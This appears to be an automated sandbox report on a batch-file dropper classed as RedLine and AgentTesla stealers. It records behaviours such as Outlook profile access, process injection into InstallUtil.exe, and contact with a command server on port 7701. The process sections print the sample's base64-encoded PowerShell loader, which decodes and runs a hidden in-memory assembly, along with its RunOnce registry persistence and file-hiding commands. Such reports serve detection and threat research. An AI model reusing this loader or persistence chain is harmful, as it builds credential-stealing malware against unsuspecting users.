Analysis Overview
SHA256
4d530eb7103ec1921ee6d96f8ce1d198383e37c031d48e7f370075f64fd23e8c
Threat Level: Known bad
The file 4d530eb7103ec1921ee6d96f8ce1d198383e37c031d48e7f370075f64fd23e8c was found to be: Known bad.
Malicious Activity Summary
RedLine payload
Agenttesla family
RedLine
Redline family
AgentTesla
Sets file to hidden
Executes dropped EXE
Loads dropped DLL
Adds Run key to start application
Accesses Microsoft Outlook profiles
Suspicious use of SetThreadContext
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Views/modifies file attributes
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: CmdExeWriteProcessMemorySpam
outlook_win_path
outlook_office_path
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-09 19:11
Signatures
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-09 19:11
Reported
2024-11-09 19:14
Platform
win10v2004-20241007-en
Max time kernel
137s
Max time network
146s
Command Line
Signatures
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\New folder\8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1916 set thread context of 3792 | N/A | C:\Users\Admin\AppData\Local\Temp\New folder\8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\New folder\8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\New folder\8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\New folder\8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\New folder\8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat"
C:\Windows\system32\attrib.exe
attrib +s +h "C:\Users\Admin\AppData\Local\Temp\New folder\8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat".exe
C:\Users\Admin\AppData\Local\Temp\New folder\8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat.exe
"C:\Users\Admin\AppData\Local\Temp\New folder\8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat".exe -wIn 1 -enC JABlAHgAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAEYAaQBsAGUATgBhAG0AZQA7ACAAJABsAGUAbgAgAD0AIAAkAGUAeABlAC4ATABlAG4AZwB0AGgAOwAkAGwAZQBuACAAPQAgACQAbABlAG4AIAAtACAANAA7ACQAVwBlAGIAVABpAHQAbABlACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAOwAgAGYAbwByAGUAYQBjAGgAIAAoACQAbABpAG4AZQAgAGkAbgAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQATABpAG4AZQBzACgAJABlAHgAZQAuAFIAZQBtAG8AdgBlACgAJABsAGUAbgApACkAKQAgAHsAIABpAGYAIAAoACQAbABpAG4AZQAgAC0AbABpAGsAZQAgACcAKgAgABmVKgAnACkAIAB7ACAAIAAkAFcAZQBiAFQAaQB0AGwAZQAuAEEAcABwAGUAbgBkACgAJABsAGkAbgBlAC4AUwBwAGwAaQB0ACgAJwAZlScAKQBbADEAXQApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAB9ACAAfQA7ACAAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAVwBlAGIAVABpAHQAbABlAC4AVABvAFMAdAByAGkAbgBnACgAKQApADsAJABpAG4AcAB1AHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAGIAeQB0AGUAcwAgACkAOwAkAG8AdQB0AHAAdQB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABnAHoAaQBwAFMAdAByAGUAYQBtACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAGkAbgBwAHUAdAAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbwBwAHkAVABvACgAIAAkAG8AdQB0AHAAdQB0ACAAKQA7ACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbABvAHMAZQAoACkAOwAkAGkAbgBwAHUAdAAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAGIAeQB0AGUAcwAgAD0AIAAkAG8AdQB0AHAAdQB0AC4AVABvAEEAcgByAGEAeQAoACkAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABiAHkAdABlAHMAKQA7ACAAJABhAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgB5AHQAZQBzACkAOwAgACQAbQBlAHQAaABvAGQASQBuAGYAbwAgAD0AIAAkAGEAcwBzAGUAbQBiAGwAeQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgACQAaQBuAHMAdABhAG4AYwBlACAAPQAgACQAYQBzAHMAZQBtAGIAbAB5AC4AQwByAGUAYQB0AGUASQBuAHMAdABhAG4AYwBlACgAJABtAGUAdABoAG8AZABJAG4AZgBvAC4ATgBhAG0AZQApADsAIAAkAG0AZQB0AGgAbwBkAEkAbgBmAG8ALgBJAG4AdgBvAGsAZQAoACQAaQBuAHMAdABhAG4AYwBlACwAIAAkAG4AdQBsAGwAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwA
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
C:\Windows\system32\attrib.exe
attrib -s -h "C:\Users\Admin\AppData\Local\Temp\New folder\8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat".exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 63.141.237.204:7701 | tcp | |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.209.201.84.in-addr.arpa | udp |
| US | 63.141.237.204:7701 | tcp | |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 63.141.237.204:7701 | tcp | |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 63.141.237.204:7701 | tcp | |
| US | 63.141.237.204:7701 | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\New folder\8a4b9fbacd8e070cdef780edf587a22f93e4d0a2d11f99637b53cf64596699df.bat.exe
| MD5 | 04029e121a0cfa5991749937dd22a1d9 |
| SHA1 | f43d9bb316e30ae1a3494ac5b0624f6bea1bf054 |
| SHA256 | 9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f |
| SHA512 | 6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b |
memory/1916-4-0x00007FFD99713000-0x00007FFD99715000-memory.dmp
memory/1916-5-0x00007FFD99710000-0x00007FFD9A1D1000-memory.dmp
memory/1916-16-0x00007FFD99710000-0x00007FFD9A1D1000-memory.dmp
memory/1916-11-0x000002A67D660000-0x000002A67D682000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nsof1jje.ogt.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1916-17-0x000002A67FD10000-0x000002A67FF44000-memory.dmp
memory/1916-18-0x000002A618000000-0x000002A61819E000-memory.dmp
memory/1916-19-0x000002A67FC30000-0x000002A67FCEE000-memory.dmp
memory/1916-20-0x000002A67D710000-0x000002A67D7A2000-memory.dmp
memory/3792-21-0x0000000000400000-0x00000000004C6000-memory.dmp
memory/3792-24-0x00007FFD99710000-0x00007FFD9A1D1000-memory.dmp
memory/3792-26-0x00007FFD99710000-0x00007FFD9A1D1000-memory.dmp
memory/3792-25-0x000001DA24E20000-0x000001DA24F1C000-memory.dmp
memory/3792-27-0x000001DA24E20000-0x000001DA24F18000-memory.dmp
memory/3792-40-0x000001DA24E20000-0x000001DA24F18000-memory.dmp
memory/3792-38-0x000001DA24E20000-0x000001DA24F18000-memory.dmp
memory/3792-48-0x000001DA24E20000-0x000001DA24F18000-memory.dmp
memory/3792-84-0x000001DA24E20000-0x000001DA24F18000-memory.dmp
memory/3792-78-0x000001DA24E20000-0x000001DA24F18000-memory.dmp
memory/3792-76-0x000001DA24E20000-0x000001DA24F18000-memory.dmp
memory/3792-82-0x000001DA24E20000-0x000001DA24F18000-memory.dmp
memory/3792-88-0x000001DA24E20000-0x000001DA24F18000-memory.dmp
memory/3792-86-0x000001DA24E20000-0x000001DA24F18000-memory.dmp
memory/3792-80-0x000001DA24E20000-0x000001DA24F18000-memory.dmp
memory/3792-74-0x000001DA24E20000-0x000001DA24F18000-memory.dmp
memory/3792-70-0x000001DA24E20000-0x000001DA24F18000-memory.dmp
memory/3792-68-0x000001DA24E20000-0x000001DA24F18000-memory.dmp
memory/3792-67-0x000001DA24E20000-0x000001DA24F18000-memory.dmp
memory/3792-64-0x000001DA24E20000-0x000001DA24F18000-memory.dmp
memory/3792-60-0x000001DA24E20000-0x000001DA24F18000-memory.dmp
memory/3792-58-0x000001DA24E20000-0x000001DA24F18000-memory.dmp
memory/3792-56-0x000001DA24E20000-0x000001DA24F18000-memory.dmp
memory/3792-54-0x000001DA24E20000-0x000001DA24F18000-memory.dmp
memory/3792-52-0x000001DA24E20000-0x000001DA24F18000-memory.dmp
memory/3792-72-0x000001DA24E20000-0x000001DA24F18000-memory.dmp
memory/3792-62-0x000001DA24E20000-0x000001DA24F18000-memory.dmp
memory/3792-50-0x000001DA24E20000-0x000001DA24F18000-memory.dmp
memory/3792-46-0x000001DA24E20000-0x000001DA24F18000-memory.dmp
memory/3792-44-0x000001DA24E20000-0x000001DA24F18000-memory.dmp
memory/3792-42-0x000001DA24E20000-0x000001DA24F18000-memory.dmp
memory/3792-36-0x000001DA24E20000-0x000001DA24F18000-memory.dmp
memory/3792-34-0x000001DA24E20000-0x000001DA24F18000-memory.dmp
memory/3792-32-0x000001DA24E20000-0x000001DA24F18000-memory.dmp
memory/3792-30-0x000001DA24E20000-0x000001DA24F18000-memory.dmp
memory/3792-28-0x000001DA24E20000-0x000001DA24F18000-memory.dmp
memory/1916-1781-0x00007FFD99710000-0x00007FFD9A1D1000-memory.dmp
memory/3792-2354-0x000001DA24F20000-0x000001DA24F92000-memory.dmp
memory/3792-2355-0x000001DA24F90000-0x000001DA25000000-memory.dmp
memory/3792-2356-0x00007FFD99710000-0x00007FFD9A1D1000-memory.dmp
memory/3792-2357-0x000001DA25040000-0x000001DA2508C000-memory.dmp
memory/3792-2358-0x00007FFD99710000-0x00007FFD9A1D1000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2024-11-09 19:11
Reported
2024-11-09 19:14
Platform
win7-20241023-en
Max time kernel
121s
Max time network
122s
Command Line
Signatures
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\New folder\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9 = "C:\\Users\\Admin\\AppData\\Roaming\\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat" | C:\Windows\system32\reg.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\New folder\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat.exe | N/A |
Suspicious behavior: CmdExeWriteProcessMemorySpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\New folder\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\New folder\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\New folder\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\New folder\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat"
C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce /f /v fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9 /d "C:\Users\Admin\AppData\Roaming\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat"
C:\Windows\system32\attrib.exe
attrib +s +h "C:\Users\Admin\AppData\Local\Temp\New folder\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat".exe
C:\Users\Admin\AppData\Local\Temp\New folder\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat.exe
"C:\Users\Admin\AppData\Local\Temp\New folder\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat".exe -wIn 1 -enC JABlAHgAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAEYAaQBsAGUATgBhAG0AZQA7ACAAJABsAGUAbgAgAD0AIAAkAGUAeABlAC4ATABlAG4AZwB0AGgAOwAkAGwAZQBuACAAPQAgACQAbABlAG4AIAAtACAANAA7ACQAVwBlAGIAVABpAHQAbABlACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAOwAgAGYAbwByAGUAYQBjAGgAIAAoACQAbABpAG4AZQAgAGkAbgAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQATABpAG4AZQBzACgAJABlAHgAZQAuAFIAZQBtAG8AdgBlACgAJABsAGUAbgApACkAKQAgAHsAIABpAGYAIAAoACQAbABpAG4AZQAgAC0AbABpAGsAZQAgACcAKgAgACMAKgAnACkAIAB7ACAAIAAkAFcAZQBiAFQAaQB0AGwAZQAuAEEAcABwAGUAbgBkACgAJABsAGkAbgBlAC4AUwBwAGwAaQB0ACgAJwAjACcAKQBbADEAXQApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAB9ACAAfQA7ACAAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAVwBlAGIAVABpAHQAbABlAC4AVABvAFMAdAByAGkAbgBnACgAKQApADsAJABpAG4AcAB1AHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAGIAeQB0AGUAcwAgACkAOwAkAG8AdQB0AHAAdQB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABnAHoAaQBwAFMAdAByAGUAYQBtACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAGkAbgBwAHUAdAAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbwBwAHkAVABvACgAIAAkAG8AdQB0AHAAdQB0ACAAKQA7ACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbABvAHMAZQAoACkAOwAkAGkAbgBwAHUAdAAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAGIAeQB0AGUAcwAgAD0AIAAkAG8AdQB0AHAAdQB0AC4AVABvAEEAcgByAGEAeQAoACkAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABiAHkAdABlAHMAKQA7ACAAJABhAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgB5AHQAZQBzACkAOwAgACQAbQBlAHQAaABvAGQASQBuAGYAbwAgAD0AIAAkAGEAcwBzAGUAbQBiAGwAeQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgACQAaQBuAHMAdABhAG4AYwBlACAAPQAgACQAYQBzAHMAZQBtAGIAbAB5AC4AQwByAGUAYQB0AGUASQBuAHMAdABhAG4AYwBlACgAJABtAGUAdABoAG8AZABJAG4AZgBvAC4ATgBhAG0AZQApADsAIAAkAG0AZQB0AGgAbwBkAEkAbgBmAG8ALgBJAG4AdgBvAGsAZQAoACQAaQBuAHMAdABhAG4AYwBlACwAIAAkAG4AdQBsAGwAKQAgAHwAIABPAHUAdAAtAE4AdQBsAGwA
C:\Windows\system32\attrib.exe
attrib -s -h "C:\Users\Admin\AppData\Local\Temp\New folder\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat".exe
Network
Files
C:\Users\Admin\AppData\Local\Temp\New folder\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat.exe
| MD5 | 92f44e405db16ac55d97e3bfe3b132fa |
| SHA1 | 04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d |
| SHA256 | 6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7 |
| SHA512 | f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f |
memory/2452-6-0x0000000074901000-0x0000000074902000-memory.dmp
memory/2452-7-0x0000000074900000-0x0000000074EAB000-memory.dmp
memory/2452-8-0x0000000074900000-0x0000000074EAB000-memory.dmp
memory/2452-9-0x0000000074900000-0x0000000074EAB000-memory.dmp
memory/2452-10-0x0000000074900000-0x0000000074EAB000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2024-11-09 19:11
Reported
2024-11-09 19:14
Platform
win10v2004-20241007-en
Max time kernel
93s
Max time network
136s
Command Line
Signatures
AgentTesla
Agenttesla family
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\New folder\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat.exe | N/A |
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9 = "C:\\Users\\Admin\\AppData\\Roaming\\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat" | C:\Windows\system32\reg.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1764 set thread context of 4904 | N/A | C:\Users\Admin\AppData\Local\Temp\New folder\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\New folder\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\New folder\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\New folder\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\New folder\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\New folder\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat"
C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce /f /v fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9 /d "C:\Users\Admin\AppData\Roaming\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat"
C:\Windows\system32\attrib.exe
attrib +s +h "C:\Users\Admin\AppData\Local\Temp\New folder\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat".exe
C:\Users\Admin\AppData\Local\Temp\New folder\fab9a387bb96927cbd244960956e4b0afc3b30bee530a52e4c37b7bc787804e9.bat.exe
